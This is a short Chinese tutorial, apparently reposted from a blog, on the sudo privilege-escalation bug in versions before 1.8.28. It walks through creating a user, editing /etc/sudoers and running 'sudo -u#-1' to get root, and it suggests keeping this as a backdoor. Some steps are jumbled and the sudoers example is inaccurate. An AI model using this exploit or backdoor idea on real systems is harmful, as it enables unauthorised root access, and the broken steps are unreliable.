sudo是linux下普通用户使用root权限的命令,sudo配置文件中使用 ALL 语句,可以使普通账号通过vim执行root权限命令。
影响 sudo 1.8.28 之前的所有版本。
1.查看版本 sudo -V
useradd test
passwd test3.修改sudo文件
vi /etc/sudoers 添加 test ALL=(ALL:ALL) ALL
4.以普通用户test编辑执行命令
普通执行,是查看不了root权限的文件。
执行 sudo -u#-1 命令
漏洞有点鸡肋,需先修改sudoers文件,顶多做个预留后门,后期使普通账户拥有最高权限。
原文:https://www.cnblogs.com/sstfy/p/11695967.html